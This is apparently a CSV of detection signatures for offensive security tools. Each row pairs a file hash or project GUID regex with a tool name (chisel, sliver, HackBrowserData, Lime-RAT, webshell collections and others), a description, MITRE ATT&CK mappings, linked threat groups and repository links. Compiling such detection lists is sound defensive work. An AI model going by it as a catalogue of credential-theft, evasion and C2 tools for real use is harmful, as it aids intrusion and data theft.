"*f15f6182ca98bb702c2578efc0aef6e35d8237b89a00a588364bb7e068b132fa*",".{0,1000}f15f6182ca98bb702c2578efc0aef6e35d8237b89a00a588364bb7e068b132fa.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","Black Basta","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","#filehash","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","43765" 
"*f15fa262d8f920942732454e30ba9d97487bfa6249e9ac561be57d567580f63d*",".{0,1000}f15fa262d8f920942732454e30ba9d97487bfa6249e9ac561be57d567580f63d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","43766" "*F1653F20-D47D-4F29-8C55-3C835542AF5F*",".{0,1000}F1653F20\-D47D\-4F29\-8C55\-3C835542AF5F.{0,1000}","offensive_tool_keyword","BrowserGhost","This is a tool for grabbing browser passwords","T1555.003 - T1555.013 - T1003.008","TA0006","N/A","N/A","Credential Access","https://github.com/QAX-A-Team/BrowserGhost","1","0","#GUIDproject","N/A","10","10","1414","206","2022-05-21T14:09:45Z","2020-06-12T12:19:06Z","43768" "*F1653F20-D47D-4F29-8C55-3C835542AF5F*",".{0,1000}F1653F20\-D47D\-4F29\-8C55\-3C835542AF5F.{0,1000}","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","COZY BEAR","Credential Access","https://github.com/djhohnstein/SharpChromium","1","0","#GUIDproject","N/A","10","8","712","100","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z","43769" "*f1696fdc28bdb9e757a14b2ba9e698af8f70bb928d3c9e9fb524249f20231d08*","f1696fdc28bdb9e757a14b2ba9e698af8f70bb928d3c9e9fb524249f20231d08","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","43770" 
"*f17e974041fcd977a7aa0171c31af287be975d6095d91ed5c5773446d7379bbc*",".{0,1000}f17e974041fcd977a7aa0171c31af287be975d6095d91ed5c5773446d7379bbc.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","43773" "*f1802e0de6eea66fde52537a15d0a2972d53b74e5a2cb016f6722daec68c97ba*",".{0,1000}f1802e0de6eea66fde52537a15d0a2972d53b74e5a2cb016f6722daec68c97ba.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","43774" "*f1820351dc1390a481acee014d8c630903a5d83f3338f81fe31e86476432513e*",".{0,1000}f1820351dc1390a481acee014d8c630903a5d83f3338f81fe31e86476432513e.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","43775" "*f18594dd9281bf3b8450f6528e209afca27b24998d653077f1e371126ea0aeea*",".{0,1000}f18594dd9281bf3b8450f6528e209afca27b24998d653077f1e371126ea0aeea.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","43776" 
"*f187ab7396fc3a96e9549316af3e8eaf9ecdca41adec82d98ca52e67974811a8*",".{0,1000}f187ab7396fc3a96e9549316af3e8eaf9ecdca41adec82d98ca52e67974811a8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","43778" "*f18bc0dae72814ff2e076c2b61846a35d00575c4e1554f74a4a70a036a15f9c5*",".{0,1000}f18bc0dae72814ff2e076c2b61846a35d00575c4e1554f74a4a70a036a15f9c5.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","43779" "*f19bd04ee2c9271e758bc21fc681f0a08ebf441a70b3221ccf5d201d5ae70f9b*",".{0,1000}f19bd04ee2c9271e758bc21fc681f0a08ebf441a70b3221ccf5d201d5ae70f9b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","43784" "*f1a21c50b4c315780c16c0777f84b5fa407a98acc014cf68ff05e3c007ce2f0c*",".{0,1000}f1a21c50b4c315780c16c0777f84b5fa407a98acc014cf68ff05e3c007ce2f0c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","43785" "*f1a3a780227dec46aa938096d1a8d8f6240e711d757a25aaec0f6c6adf0a495a*",".{0,1000}f1a3a780227dec46aa938096d1a8d8f6240e711d757a25aaec0f6c6adf0a495a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","43786" "*f1a6e3b13ff54c97ac5b84805277fd033f45ad2419b7f4322bd30adf72179743*",".{0,1000}f1a6e3b13ff54c97ac5b84805277fd033f45ad2419b7f4322bd30adf72179743.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN 
interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","43787" "*f1bdbea3a5f869e83b52e6284e24d76049a3505492a8b7176cb07f2ad03cbe2b*",".{0,1000}f1bdbea3a5f869e83b52e6284e24d76049a3505492a8b7176cb07f2ad03cbe2b.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","#filehash","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","43791" "*f1c145f20ea495e5d9df00513b6fcb05b2dd7e0f7f126626372c6d65b25ddf76*",".{0,1000}f1c145f20ea495e5d9df00513b6fcb05b2dd7e0f7f126626372c6d65b25ddf76.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","43792" "*f1c61181201c45d01a05a4c00d6e2f392e4afcf7c4133f71151ef6ad20887d17*",".{0,1000}f1c61181201c45d01a05a4c00d6e2f392e4afcf7c4133f71151ef6ad20887d17.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","43794" 
"*f1c6a2f008eb7888b5b081a834088a4a1b6fd688db3c99c89541d673489ae130*",".{0,1000}f1c6a2f008eb7888b5b081a834088a4a1b6fd688db3c99c89541d673489ae130.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","43795" "*f1ddf8432a3f2db1ab2b679abaeaccd61fc601cf2e45cf0f95d169759bc6eaf2*",".{0,1000}f1ddf8432a3f2db1ab2b679abaeaccd61fc601cf2e45cf0f95d169759bc6eaf2.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","43797" "*F1DF1D0F-FF86-4106-97A8-F95AAF525C54*",".{0,1000}F1DF1D0F\-FF86\-4106\-97A8\-F95AAF525C54.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","#GUIDproject","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","43798" "*f1e7f37e2e04dc87b374beae26496df2fa80cbce527ae6276c387b82e725d021*",".{0,1000}f1e7f37e2e04dc87b374beae26496df2fa80cbce527ae6276c387b82e725d021.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","43799" "*F1E836C1-2279-49B3-84CC-ED8B048FCC44*",".{0,1000}F1E836C1\-2279\-49B3\-84CC\-ED8B048FCC44.{0,1000}","offensive_tool_keyword","WDBypass","Disable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)","T1089 - T1562.001 - T1548.002","TA0005 - TA0040 - TA0003 - TA0004","N/A","Dispossessor","Defense 
Evasion","https://bitbucket.org/evilgreyswork/wd-uac/downloads/","1","0","#GUIDproject","https://blog.injectexp.dev/2024/02/28/disable-windows-defender-uac-bypass-upgrade-to-system/","10","10","N/A","N/A","N/A","N/A","43800" "*f1fc15082123a79f5350a6bf7897f4ac9c7474619f96efc556754918f3926ae7*",".{0,1000}f1fc15082123a79f5350a6bf7897f4ac9c7474619f96efc556754918f3926ae7.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","43802" "*f1zm0/acheron*",".{0,1000}f1zm0\/acheron.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","N/A","4","326","39","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z","43805" "*f1zm0/hades*",".{0,1000}f1zm0\/hades.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/f1zm0/hades","1","1","N/A","N/A","N/A","4","364","47","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z","43806" "*f20052cf692339ff89a490dd7d9f83f5b77be532d5f127f6ed186cf387622ed5*",".{0,1000}f20052cf692339ff89a490dd7d9f83f5b77be532d5f127f6ed186cf387622ed5.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","43807" 
"*f205814e44353d23a5cef0e3cbfb37cc8ec4bfad9def53384d671dcc043c00ee*",".{0,1000}f205814e44353d23a5cef0e3cbfb37cc8ec4bfad9def53384d671dcc043c00ee.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","43808" "*f20a1b4cdc2caf7baa975c8be3343063b5c819bda30807ffec6cddf822842c6a*",".{0,1000}f20a1b4cdc2caf7baa975c8be3343063b5c819bda30807ffec6cddf822842c6a.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","43809" "*f213e2033269abce384e1f85c7ab9730d3527f6b1258322e8d3ad17e4e1f6498*",".{0,1000}f213e2033269abce384e1f85c7ab9730d3527f6b1258322e8d3ad17e4e1f6498.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","43810" "*f2179c77b91b691efbf523410bdd70aa97c9a6866d5d13004a8ff559243f18e0*",".{0,1000}f2179c77b91b691efbf523410bdd70aa97c9a6866d5d13004a8ff559243f18e0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","43812" "*f22360bb210b78e92b7aecfefb3c0c70e72e81cd03c1afd616e7691a744c3b28*",".{0,1000}f22360bb210b78e92b7aecfefb3c0c70e72e81cd03c1afd616e7691a744c3b28.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","43813" "*f22c8a9bf9bba73a4b5ad20ba6666c8da8b1d77eaf670448b25792336de7f512*",".{0,1000}f22c8a9bf9bba73a4b5ad20ba6666c8da8b1d77eaf670448b25792336de7f512.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","43814" 
"*F233D36D-B64A-4F14-A9F9-B8557C2D4F5D*",".{0,1000}F233D36D\-B64A\-4F14\-A9F9\-B8557C2D4F5D.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","43815" "*f236aee384d7a0fab7fc186454ee6adb83b756843ecf75ec14b3df826a66ff1d*",".{0,1000}f236aee384d7a0fab7fc186454ee6adb83b756843ecf75ec14b3df826a66ff1d.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","#filehash","N/A","9","2","174","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z","43816" "*F2378C48-D441-49E7-B094-1E8642A7E7C0*",".{0,1000}F2378C48\-D441\-49E7\-B094\-1E8642A7E7C0.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","43817" "*f23950926273d8ee262e32edf0325618322cc22a9fbaf300d5692e48c5fdd18c*",".{0,1000}f23950926273d8ee262e32edf0325618322cc22a9fbaf300d5692e48c5fdd18c.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","43818" "*f23ac192b0a075ff7d7f26185c99b21cfb1b46ec211e67cdae626d200476f3b7*",".{0,1000}f23ac192b0a075ff7d7f26185c99b21cfb1b46ec211e67cdae626d200476f3b7.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","43819" "*f2514c44ea0566d15601e6179fab45dbb023b78cb0903a28196a31599f17be00*",".{0,1000}f2514c44ea0566d15601e6179fab45dbb023b78cb0903a28196a31599f17be00.{0,1000}","offensive_tool_keyword","SharpVeeamDecryptor","Decrypt Veeam database passwords","T1555.005 - T1003 - T1059 - T1070.004","TA0006 - TA0005 - TA0008","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/SharpVeeamDecryptor","1","0","#filehash","used by EMBARGO Ransomware","10","2","158","18","2023-11-07T14:00:47Z","2023-11-07T14:00:45Z","43821" "*f253b430b9d2dafe0e67a9974e7a806f21c6589c02aed1cdc595d23fe619f492*",".{0,1000}f253b430b9d2dafe0e67a9974e7a806f21c6589c02aed1cdc595d23fe619f492.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","43822" "*f25631f72f20a2ce8a443207938a6cffb63d0b48bab281a80dc64a0d315680bf*",".{0,1000}f25631f72f20a2ce8a443207938a6cffb63d0b48bab281a80dc64a0d315680bf.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","43823" "*f2691b74-129f-4ac2-a88a-db4b0f36b609*",".{0,1000}f2691b74\-129f\-4ac2\-a88a\-db4b0f36b609.{0,1000}","offensive_tool_keyword","Browser Data Grabber","credential access tool used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential 
Access","https://github.com/n37sn4k3/BrowserDataGrabber","1","0","#GUIDproject","N/A","10","1","7","4","2018-05-28T15:49:03Z","2018-05-04T12:33:32Z","43825" "*f26f806ab5bce710cc598cc1623c2094e06b36548240c5db136d7e6d32ccbae5*",".{0,1000}f26f806ab5bce710cc598cc1623c2094e06b36548240c5db136d7e6d32ccbae5.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","0","#filehash","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","43826" "*f273248a26cf21cef5c0f1288f90b5aef915b477c81eb62949ab4e519b4b604b*",".{0,1000}f273248a26cf21cef5c0f1288f90b5aef915b477c81eb62949ab4e519b4b604b.{0,1000}","offensive_tool_keyword","chunk-Proxy","A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.","T1505.003 - T1059 - T1105 - T1071","TA0011 - TA0002 - TA0003","Ghost Ransomware","N/A","C2","https://github.com/BeichenDream/Chunk-Proxy","1","0","#filehash","N/A","10","10","283","40","2022-05-07T04:24:50Z","2021-10-28T18:45:21Z","43827" "*f27479a8728d9126cc055daeb5cddd01cabfa37d*",".{0,1000}f27479a8728d9126cc055daeb5cddd01cabfa37d.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","43828" "*f2754719c9b797be118057367989dc2da30a55d3f17260b55d252efdf7967579*",".{0,1000}f2754719c9b797be118057367989dc2da30a55d3f17260b55d252efdf7967579.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","43829" "*f2816b74ccb015b5eb7910f0ee389531ffaa0df8bc613d419cc4d4a50e99bb4e*",".{0,1000}f2816b74ccb015b5eb7910f0ee389531ffaa0df8bc613d419cc4d4a50e99bb4e.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","#filehash","N/A","10","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","43831" "*f283690950663e8831078bd3f7d02835047997f65445f90a364626fb835809c4*",".{0,1000}f283690950663e8831078bd3f7d02835047997f65445f90a364626fb835809c4.{0,1000}","offensive_tool_keyword","nsocks",".NET HttpClient proxy handler implementation for SOCKS proxies","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider* - Black Basta","C2","https://github.com/bbepis/Nsocks","1","0","#filehash","N/A","8","10","3","0","2020-06-08T17:25:07Z","2020-03-28T09:00:22Z","43832" "*f285e0f2aa29132c803b6f135bcabd7b93c0f91d7340735f8c60ae90ad4f3f8e*",".{0,1000}f285e0f2aa29132c803b6f135bcabd7b93c0f91d7340735f8c60ae90ad4f3f8e.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","43833" "*f2894f6ee03703bbd4a7940eb5a29d1521beee7c44d4e2fc095b65b667697365*",".{0,1000}f2894f6ee03703bbd4a7940eb5a29d1521beee7c44d4e2fc095b65b667697365.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","43834" 